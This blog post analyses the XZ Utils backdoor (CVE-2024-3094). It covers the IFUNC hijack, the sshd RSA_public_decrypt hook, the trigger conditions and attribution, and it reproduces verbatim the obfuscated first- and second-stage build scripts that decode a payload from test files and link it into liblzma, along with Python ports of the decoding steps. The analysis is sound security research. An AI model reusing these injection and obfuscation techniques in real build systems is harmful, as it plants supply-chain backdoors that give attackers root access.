XZ BackDoor (CVE-2024-3094): a Multi-Year Effort by an Advanced Threat Actor

In this post I provide a technical deep dive into, and some considerations about, the recently disclosed XZ BackDoor (CVE-2024-3094). The backdoor affects XZ Utils, a data compression toolkit and library (liblzma) shipped by most Linux distributions, and it had the potential for severe consequences, including remote code execution (RCE) and unauthorized access to impacted systems. I also look at the sophisticated, long-term nature of the attack, which suggests the involvement of a state-sponsored threat actor. The attacker’s tactics, techniques, and procedures (TTPs) show a high level of technical expertise and a well-planned, multi-stage approach to infiltrating the XZ Utils project and introducing the malicious code.

Malicious Code Implementation Overview

The implementation of the XZ BackDoor (CVE-2024-3094) is multi-layered and combines several advanced techniques. At its core is the abuse of the IFUNC (indirect function) mechanism of the GNU C library (glibc). Indirect functions let a library ship several versions of a function and choose one at load time through a resolver function, typically to select an implementation optimized for the CPU in use. liblzma uses IFUNC resolvers to select its CRC32 and CRC64 implementations. Because resolvers run very early, while the dynamic linker is still loading the process, the attacker modified them so that malicious code runs at that point. That code then arranges for the RSA signature-verification function used by OpenSSH (RSA_public_decrypt) to be replaced with the attacker’s implementation.

The IFUNC hijacking is accompanied by an obfuscated script in the XZ Utils build system. The script injects a malicious object file into the liblzma shared object (SO) at build time; this object contains the core of the backdoor, including the code called from the resolvers and the malicious RSA_public_decrypt replacement. The payload is hidden inside files that look like compressed test data and is recovered through several layers of byte substitution and decompression, which makes both the script and the injected object hard to detect.

The attacker also tied the malicious components to the release process: the piece that triggers the injection is present in the distributed source tarballs but not in the public Git repository. This allowed the backdoor to avoid detection during software distribution and deployment, relying on modified build scripts that inject the malicious object at specific points in the build.

At runtime, the injected code checks for specific conditions and, when they hold, lets the attacker execute arbitrary commands on the affected system.
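
To make the resolver idea more concrete, here is a loose Python analogy of IFUNC-style dispatch. It is only an illustration of the concept, not glibc’s mechanism and not the attacker’s code: all names (resolve_crc, crc_generic, crc_accelerated, hijacked_resolver) are hypothetical, and the two "implementations" return labels rather than real checksums.

```python
from typing import Callable, List

def crc_generic(data: bytes) -> str:
    # Placeholder for a portable implementation (returns a label, not a CRC).
    return f"generic:{len(data)}"

def crc_accelerated(data: bytes) -> str:
    # Placeholder for a CPU-specific implementation (returns a label, not a CRC).
    return f"accelerated:{len(data)}"

def resolve_crc(machine: str) -> Callable[[bytes], str]:
    """Resolver: runs once and returns the implementation to bind."""
    if machine in ("x86_64", "AMD64"):
        return crc_accelerated
    return crc_generic

# Records what a tampered resolver did besides choosing an implementation.
side_effects: List[str] = []

def hijacked_resolver(machine: str) -> Callable[[bytes], str]:
    """A tampered resolver still returns a working implementation,
    but it runs extra code first, at resolution time."""
    side_effects.append("extra code ran during resolution")
    return resolve_crc(machine)
```

The caller sees the same function either way, which is why a tampered resolver is hard to notice from the outside: the extra work happens once, before any normal code of the program runs.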

A not so “open” code

One of the points most often made about the security of open-source code is that anyone can inspect and audit it at any time, which is in itself a big advantage over the presumed security of “closed” code. Consequently, one of the questions that has most gripped people in the sector is: how could a backdoor be included in “open” code that is subject to everyone’s review? The answer is that the backdoor’s code was not part of the project’s upstream source code. It was hidden in two binary test files, committed as data blobs rather than as source code, and injected during the build. These two files (tests/files/bad-3-corrupt_lzma2.xz and tests/files/good-large_compressed.lzma) are unpacked by the build process, which executes the following bash script as the first infection stage:

####Hello####
#��Z�.hj�
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####
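
The pipeline in the script above can be read as three byte-level steps: a repeated "skip 1024 bytes, keep 2048 bytes" carve (the chain of head commands), a tail -c cut, and a tr byte substitution. The Python sketch below mirrors those steps under simplifying assumptions: it works on an in-memory buffer rather than a pipe, the function names are mine, and the number of rounds and the final length are left as parameters instead of being hard-coded.

```python
from typing import List, Tuple

# Source ranges of the tr command (octal), in the order they appear;
# the target set of the tr command is simply \0-\377.
TR_RANGES: List[Tuple[int, int]] = [
    (0o005, 0o051), (0o204, 0o377), (0o052, 0o115),
    (0o132, 0o203), (0o000, 0o004), (0o116, 0o131),
]

def build_tr_table() -> bytes:
    """Translation table equivalent to the tr byte substitution."""
    source = bytes(b for lo, hi in TR_RANGES for b in range(lo, hi + 1))
    return bytes.maketrans(source, bytes(range(256)))

def skip_keep(data: bytes, rounds: int, final_keep: int,
              skip: int = 1024, keep: int = 2048) -> bytes:
    """Drop `skip` bytes, keep `keep` bytes, `rounds` times;
    then drop `skip` once more and keep `final_keep` bytes."""
    out = bytearray()
    pos = 0
    for _ in range(rounds):
        pos += skip
        out += data[pos:pos + keep]
        pos += keep
    pos += skip
    out += data[pos:pos + final_keep]
    return bytes(out)

def tail_from(data: bytes, start: int) -> bytes:
    """Like `tail -c +start`: output begins at the 1-indexed byte `start`."""
    return data[start - 1:]
```

With these helpers, the substitution step is tail_from(carved, 31265).translate(build_tr_table()); the result would still have to be decompressed as a raw LZMA1 stream, as the xz -F raw --lzma1 -dc step in the script does.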

This script reads tests/files/good-large_compressed.lzma, carves out and decodes the malicious content hidden in it, and pipes the result to /bin/sh, so that the following second-stage script runs as part of the build process:

P="-fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections"
C="pic_flag=\" $P\""
O="^pic_flag=\" -fPIC -DPIC\"$"
R="is_arch_extension_supported"
x="__get_cpuid("
p="good-large_compressed.lzma"
U="bad-3-corrupt_lzma2.xz"
eval $zrKcVq
if test -f config.status; then
eval $zrKcSS
eval `grep ^LD=\'\/ config.status`
eval `grep ^CC=\' config.status`
eval `grep ^GCC=\' config.status`
eval `grep ^srcdir=\' config.status`
eval `grep ^build=\'x86_64 config.status`
eval `grep ^enable_shared=\'yes\' config.status`
eval `grep ^enable_static=\' config.status`
eval `grep ^gl_path_map=\' config.status`
eval $zrKccj
if ! grep -qs '\["HAVE_FUNC_ATTRIBUTE_IFUNC"\]=" 1"' config.status > /dev/null 2>&1;then
exit 0
fi
if ! grep -qs 'define HAVE_FUNC_ATTRIBUTE_IFUNC 1' config.h > /dev/null 2>&1;then
exit 0
fi
if test "x$enable_shared" != "xyes";then
exit 0
fi
if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then
exit 0
fi
if ! grep -qs "$R()" $srcdir/src/liblzma/check/crc64_fast.c > /dev/null 2>&1; then
exit 0
fi
if ! grep -qs "$R()" $srcdir/src/liblzma/check/crc32_fast.c > /dev/null 2>&1; then
exit 0
fi
if ! grep -qs "$R" $srcdir/src/liblzma/check/crc_x86_clmul.h > /dev/null 2>&1; then
exit 0
fi
if ! grep -qs "$x" $srcdir/src/liblzma/check/crc_x86_clmul.h > /dev/null 2>&1; then
exit 0
fi
if test "x$GCC" != 'xyes' > /dev/null 2>&1;then
exit 0
fi
if test "x$CC" != 'xgcc' > /dev/null 2>&1;then
exit 0
fi
LDv=$LD" -v"
if ! $LDv 2>&1 | grep -qs 'GNU ld' > /dev/null 2>&1;then
exit 0
fi
if ! test -f "$srcdir/tests/files/$p" > /dev/null 2>&1;then
exit 0
fi
if ! test -f "$srcdir/tests/files/$U" > /dev/null 2>&1;then
exit 0
fi
if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then
eval $zrKcst
j="^ACLOCAL_M4 = \$(top_srcdir)\/aclocal.m4"
if ! grep -qs "$j" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
z="^am__uninstall_files_from_dir = {"
if ! grep -qs "$z" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
w="^am__install_max ="
if ! grep -qs "$w" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
E=$z
if ! grep -qs "$E" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
Q="^am__vpath_adj_setup ="
if ! grep -qs "$Q" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
M="^am__include = include"
if ! grep -qs "$M" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
L="^all: all-recursive$"
if ! grep -qs "$L" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
m="^LTLIBRARIES = \$(lib_LTLIBRARIES)"
if ! grep -qs "$m" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
u="AM_V_CCLD = \$(am__v_CCLD_\$(V))"
if ! grep -qs "$u" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
if ! grep -qs "$O" libtool > /dev/null 2>&1;then
exit 0
fi
eval $zrKcTy
b="am__test = $U"
sed -i "/$j/i$b" src/liblzma/Makefile || true
d=`echo $gl_path_map | sed 's/\\\/\\\\\\\\/g'`
b="am__strip_prefix = $d"
sed -i "/$w/i$b" src/liblzma/Makefile || true
b="am__dist_setup = \$(am__strip_prefix) | xz -d 2>/dev/null | \$(SHELL)"
sed -i "/$E/i$b" src/liblzma/Makefile || true
b="\$(top_srcdir)/tests/files/\$(am__test)"
s="am__test_dir=$b"
sed -i "/$Q/i$s" src/liblzma/Makefile || true
h="-Wl,--sort-section=name,-X"
if ! echo "$LDFLAGS" | grep -qs -e "-z,now" -e "-z -Wl,now" > /dev/null 2>&1;then
h=$h",-z,now"
fi
j="liblzma_la_LDFLAGS += $h"
sed -i "/$L/i$j" src/liblzma/Makefile || true
sed -i "s/$O/$C/g" libtool || true
k="AM_V_CCLD = @echo -n \$(LTDEPS); \$(am__v_CCLD_\$(V))"
sed -i "s/$u/$k/" src/liblzma/Makefile || true
l="LTDEPS='\$(lib_LTDEPS)'; \\\\\n\
    export top_srcdir='\$(top_srcdir)'; \\\\\n\
    export CC='\$(CC)'; \\\\\n\
    export DEFS='\$(DEFS)'; \\\\\n\
    export DEFAULT_INCLUDES='\$(DEFAULT_INCLUDES)'; \\\\\n\
    export INCLUDES='\$(INCLUDES)'; \\\\\n\
    export liblzma_la_CPPFLAGS='\$(liblzma_la_CPPFLAGS)'; \\\\\n\
    export CPPFLAGS='\$(CPPFLAGS)'; \\\\\n\
    export AM_CFLAGS='\$(AM_CFLAGS)'; \\\\\n\
    export CFLAGS='\$(CFLAGS)'; \\\\\n\
    export AM_V_CCLD='\$(am__v_CCLD_\$(V))'; \\\\\n\
    export liblzma_la_LINK='\$(liblzma_la_LINK)'; \\\\\n\
    export libdir='\$(libdir)'; \\\\\n\
    export liblzma_la_OBJECTS='\$(liblzma_la_OBJECTS)'; \\\\\n\
    export liblzma_la_LIBADD='\$(liblzma_la_LIBADD)'; \\\\\n\
sed rpath \$(am__test_dir) | \$(am__dist_setup) >/dev/null 2>&1";
sed -i "/$m/i$l" src/liblzma/Makefile || true
eval $zrKcHD
fi
elif (test -f .libs/liblzma_la-crc64_fast.o) && (test -f .libs/liblzma_la-crc32_fast.o); then
eval $zrKcKQ
if ! grep -qs "$R()" $top_srcdir/src/liblzma/check/crc64_fast.c; then
exit 0
fi
if ! grep -qs "$R()" $top_srcdir/src/liblzma/check/crc32_fast.c; then
exit 0
fi
if ! grep -qs "$R" $top_srcdir/src/liblzma/check/crc_x86_clmul.h; then
exit 0
fi
if ! grep -qs "$x" $top_srcdir/src/liblzma/check/crc_x86_clmul.h; then
exit 0
fi
if ! grep -qs "$C" ../../libtool; then
exit 0
fi
if ! echo $liblzma_la_LINK | grep -qs -e "-z,now" -e "-z -Wl,now" > /dev/null 2>&1;then
exit 0
fi
if echo $liblzma_la_LINK | grep -qs -e "lazy" > /dev/null 2>&1;then
exit 0
fi
N=0
W=0
Y=`grep "dnl Convert it to C string syntax." $top_srcdir/m4/gettext.m4`
eval $zrKcjv
if test -z "$Y"; then
N=0
W=88792
else
N=88792
W=0
fi
xz -dc $top_srcdir/tests/files/$p | eval $i | LC_ALL=C sed "s/\(.\)/\1\n/g" | LC_ALL=C awk 'BEGIN{FS="\n";RS="\n";ORS="";m=256;for(i=0;i<m;i++){t[sprintf("x%c",i)]=i;c[i]=((i*7)+5)%m;}i=0;j=0;for(l=0;l<4096;l++){i=(i+1)%m;a=c[i];j=(j+a)%m;c[i]=c[j];c[j]=a;}}{v=t["x" (NF<1?RS:$1)];i=(i+1)%m;a=c[i];j=(j+a)%m;b=c[j];c[i]=b;c[j]=a;k=c[(a+b)%m];printf "%c",(v+k)%m}' | xz -dc --single-stream | ((head -c +$N > /dev/null 2>&1) && head -c +$W) > liblzma_la-crc64-fast.o || true
if ! test -f liblzma_la-crc64-fast.o; then
exit 0
fi
cp .libs/liblzma_la-crc64_fast.o .libs/liblzma_la-crc64-fast.o || true
V='#endif\n#if defined(CRC32_GENERIC) && defined(CRC64_GENERIC) && defined(CRC_X86_CLMUL) && defined(CRC_USE_IFUNC) && defined(PIC) && (defined(BUILDING_CRC64_CLMUL) || defined(BUILDING_CRC32_CLMUL))\nextern int _get_cpuid(int, void*, void*, void*, void*, void*);\nstatic inline bool _is_arch_extension_supported(void) { int success = 1; uint32_t r[4]; success = _get_cpuid(1, &r[0], &r[1], &r[2], &r[3], ((char*) __builtin_frame_address(0))-16); const uint32_t ecx_mask = (1 << 1) | (1 << 9) | (1 << 19); return success && (r[2] & ecx_mask) == ecx_mask; }\n#else\n#define _is_arch_extension_supported is_arch_extension_supported'
eval $yosA
if sed "/return is_arch_extension_supported()/ c\return _is_arch_extension_supported()" $top_srcdir/src/liblzma/check/crc64_fast.c | \
sed "/include \"crc_x86_clmul.h\"/a \\$V" | \
sed "1i # 0 \"$top_srcdir/src/liblzma/check/crc64_fast.c\"" 2>/dev/null | \
$CC $DEFS $DEFAULT_INCLUDES $INCLUDES $liblzma_la_CPPFLAGS $CPPFLAGS $AM_CFLAGS $CFLAGS -r liblzma_la-crc64-fast.o -x c -  $P -o .libs/liblzma_la-crc64_fast.o 2>/dev/null; then
cp .libs/liblzma_la-crc32_fast.o .libs/liblzma_la-crc32-fast.o || true
eval $BPep
if sed "/return is_arch_extension_supported()/ c\return _is_arch_extension_supported()" $top_srcdir/src/liblzma/check/crc32_fast.c | \
sed "/include \"crc32_arm64.h\"/a \\$V" | \
sed "1i # 0 \"$top_srcdir/src/liblzma/check/crc32_fast.c\"" 2>/dev/null | \
$CC $DEFS $DEFAULT_INCLUDES $INCLUDES $liblzma_la_CPPFLAGS $CPPFLAGS $AM_CFLAGS $CFLAGS -r -x c -  $P -o .libs/liblzma_la-crc32_fast.o; then
eval $RgYB
if $AM_V_CCLD$liblzma_la_LINK -rpath $libdir $liblzma_la_OBJECTS $liblzma_la_LIBADD; then
if test ! -f .libs/liblzma.so; then
mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || true
mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true
fi
rm -fr .libs/liblzma.a .libs/liblzma.la .libs/liblzma.lai .libs/liblzma.so* || true
else
mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || true
mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true
fi
rm -f .libs/liblzma_la-crc32-fast.o || true
rm -f .libs/liblzma_la-crc64-fast.o || true
else
mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || true
mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true
fi
else
mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true
fi
rm -f liblzma_la-crc64-fast.o || true
fi
eval $DHLd
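
The awk one-liner in the script above is the step that decrypts the hidden object file. It behaves like an RC4-style stream cipher with a fixed, keyless initial state, a 4096-round warm-up, and byte addition instead of XOR. The following Python port is a sketch based on my reading of that awk code; the function names are mine, and it processes a bytes object directly instead of the one-character-per-line stream produced by the sed command.

```python
from typing import List, Tuple

M = 256

def warmed_state() -> Tuple[List[int], int, int]:
    """Fixed S-box c[i] = (7*i + 5) % 256, then 4096 warm-up swaps."""
    c = [(i * 7 + 5) % M for i in range(M)]
    i = j = 0
    for _ in range(4096):
        i = (i + 1) % M
        a = c[i]
        j = (j + a) % M
        c[i] = c[j]
        c[j] = a
    return c, i, j

def decode(data: bytes) -> bytes:
    """Add one keystream byte to every input byte, modulo 256."""
    c, i, j = warmed_state()
    out = bytearray()
    for v in data:
        i = (i + 1) % M
        a = c[i]
        j = (j + a) % M
        b = c[j]
        c[i], c[j] = b, a          # swap, as in RC4
        k = c[(a + b) % M]         # keystream byte, taken after the swap
        out.append((v + k) % M)
    return bytes(out)
```

Since the initial state is a constant and no secret key is involved, this layer is obfuscation rather than encryption: anyone holding the test file can reproduce the keystream.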

As can be observed, the script extracts an object file, liblzma_la-crc64-fast.o, from the test data and links it into the legitimate liblzma_la-crc64_fast.o, so that it passes for part of the CRC64 code. The injected object is where the final malicious payload resides (sha256:cbeef92e67bf41ca9c015557d81f39adaba67ca9fb3574139754999030b83537). The malicious code leverages the ifunc (indirect function) mechanism to intercept the execution of the crc32_resolve() and crc64_resolve() functions in the xz/liblzma library. The backdoored versions of these resolvers first call a function named _get_cpuid(), which is injected into the compiled liblzma library. Its name mimics the legitimate __get_cpuid() CPU-feature helper, but it is defined in the injected object and serves as the backdoor’s entry point. The restriction to x86-64 Linux builds is enforced earlier, by the checks in the build script.

If the required conditions are met, the backdoor’s versions of crc32_resolve() and crc64_resolve() are executed instead of the original functions. The ifunc mechanism was probably chosen to make the backdoor less suspicious, since crc32_resolve() and crc64_resolve() calling a _get_cpuid() function looks like a normal part of the upstream xz/liblzma library.

The backdoor also installs an “audit hook” into the dynamic linker, the component responsible for resolving library dependencies and symbols at runtime. By hooking into the linker’s audit mechanism, the backdoor can intercept and modify the resolution of symbols. The hook is called from the _dl_audit_symbind function within the dynamic linker and, crucially, it appears to wait specifically for the resolution of the RSA_public_decrypt@ symbol, a function that OpenSSH uses to verify RSA signatures during SSH key authentication. Targeting this symbol, in my opinion, highlights the attacker’s deep understanding of the SSH authentication process: once its resolution is intercepted, the hook can substitute the legitimate function with a malicious implementation that checks the input data for a specific, pre-determined condition.

In fact, the payload appears to extract hidden commands from the public-key field of the RSA certificate presented by the client. If the backdoor determines that a command was signed with the attacker’s own private key, it executes that command on the impacted system. Essentially, this lets the attacker run any command on the target machine with the privileges of sshd, which usually means the highest level of system access (“root”). It also means that meaningful interaction with a vulnerable server requires the private key held by the attacker, which rules out identifying vulnerable servers remotely through tools such as Shodan.

Other interesting aspects that emerge from the analysis of the malicious object concern the conditions under which the backdoor is triggered. These are:

1) The TERM environment variable is not set (this variable is usually set by the program that launches the login shell).

2) The running binary is /usr/sbin/sshd.

3) LD_DEBUG and LD_PROFILE are NOT set (if these variables are set, it usually indicates that someone is trying to debug, troubleshoot, or monitor the program’s behavior; this is an anti-debugging feature of the backdoor).

4) The LANG environment variable is set.
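
The four conditions listed above can be summarized as a single predicate. This is a simplified model for illustration only, covering just the conditions in the list; the function name and parameters are hypothetical, and the real payload performs further checks that are not modeled here.

```python
from typing import Mapping

def listed_conditions_met(argv0: str, env: Mapping[str, str]) -> bool:
    """True when all four listed trigger conditions hold."""
    return (
        "TERM" not in env                # 1) no terminal attached
        and argv0 == "/usr/sbin/sshd"    # 2) running as the SSH daemon
        and "LD_DEBUG" not in env        # 3) no linker debugging...
        and "LD_PROFILE" not in env      #    ...or profiling requested
        and "LANG" in env                # 4) locale is configured
    )
```

For example, an sshd started by the init system with only LANG set satisfies the predicate, while the same binary launched from an interactive shell (where TERM is normally set) does not. This helps explain why the backdoor stays silent when someone inspects sshd by hand.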

Potential Impacts

The potential impact of this SSH backdoor is serious, given the widespread use of the SSH protocol and the sophistication of the attack. SSH is a fundamental component of modern computing, used to connect securely to systems across a wide range of industries and applications, from cloud infrastructure to industrial control systems. With OpenSSH running on almost 20 million IP addresses globally, the potential scope is very large. Had the backdoor been widely deployed, a malicious actor could have gained unauthorized access to a vast number of systems worldwide. The ability to execute remote commands on affected systems could have enabled data theft, full system compromise, and the deployment of additional malware. Because the backdoor was built to evade detection, it could also have remained active for an extended period, letting the attackers target systems selectively and cover their tracks quickly, and making it even harder for defenders to identify and mitigate the threat.

Behind the XZ BackDoor

The XZ BackDoor was introduced by an individual using the name Jia Tan and the GitHub username JiaT75. The email address associated with JiaT75 is jiat0218[@]gmail.com.

The GitHub account was created in 2021 and has been active since then. This individual contributed to several open-source projects, but their primary focus appears to have been the “XZ” project. The fact that the backdoor was introduced by a contributor with an established GitHub presence, active in the xz project for over 2 years, raises significant concerns: this involvement and longevity earned a level of trust and familiarity that the attacker was able to leverage to insert the malicious code. It also raises the question of whether other versions of the software could be compromised. Considering the persistence and duration of the attack, as well as the social engineering techniques used, it is reasonable to assume that behind the JiaT75 account lies a well-organized and technically very skilled group, potentially attributable to a state-sponsored threat actor. In my opinion, this level of sophistication implies a deep understanding of the underlying Linux system architecture and a high level of expertise.

Conclusions

The XZ BackDoor was discovered in versions 5.6.0 and 5.6.1 of XZ Utils, which is widely used across Linux distributions. Affected distributions include Fedora 41, Fedora Rawhide, Debian testing/unstable/experimental, openSUSE Tumbleweed, openSUSE MicroOS, and Kali Linux. Given how widely XZ Utils is adopted, the backdoor could potentially have impacted a large number of Linux systems.

The backdoor is designed to enable remote code execution (RCE) on affected systems. It achieves this by hijacking function resolution in the OpenSSH authentication routines, allowing the attacker to execute arbitrary commands as the root user. This capability grants the attacker significant control over a compromised system.

The backdoor was introduced gradually over multiple commits, with parts of it hidden in the source tarball releases rather than in the public Git repository. This stealthy approach made the malicious changes difficult to detect during review. The use of techniques such as IFUNC (indirect functions) and layered obfuscation demonstrates a high level of technical sophistication.

The combination of widespread distribution, remote code execution capability, and stealthy implementation makes this backdoor a significant threat: attackers could have leveraged it to gain unauthorized access to, and control over, a large number of Linux systems.
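
As a practical footnote to the affected versions named above, a first triage step is to compare the installed version against 5.6.0 and 5.6.1. The sketch below assumes the version string comes from the output of xz --version; the function names are hypothetical, and a version match alone is only an indicator, since distributions may ship patched or reverted packages.

```python
import re
from typing import Optional, Tuple

# Versions named in this post as containing the backdoor.
AFFECTED_VERSIONS = {(5, 6, 0), (5, 6, 1)}

def parse_version(text: str) -> Optional[Tuple[int, ...]]:
    """Return the first x.y.z version found in `text`, or None."""
    match = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if match is None:
        return None
    return tuple(int(part) for part in match.groups())

def is_affected(text: str) -> bool:
    """True if the first version found in `text` is a backdoored release."""
    return parse_version(text) in AFFECTED_VERSIONS
```

A typical use is to pass the first line printed by xz --version to is_affected() and, on a match, follow the distribution’s advisory rather than relying on this check alone.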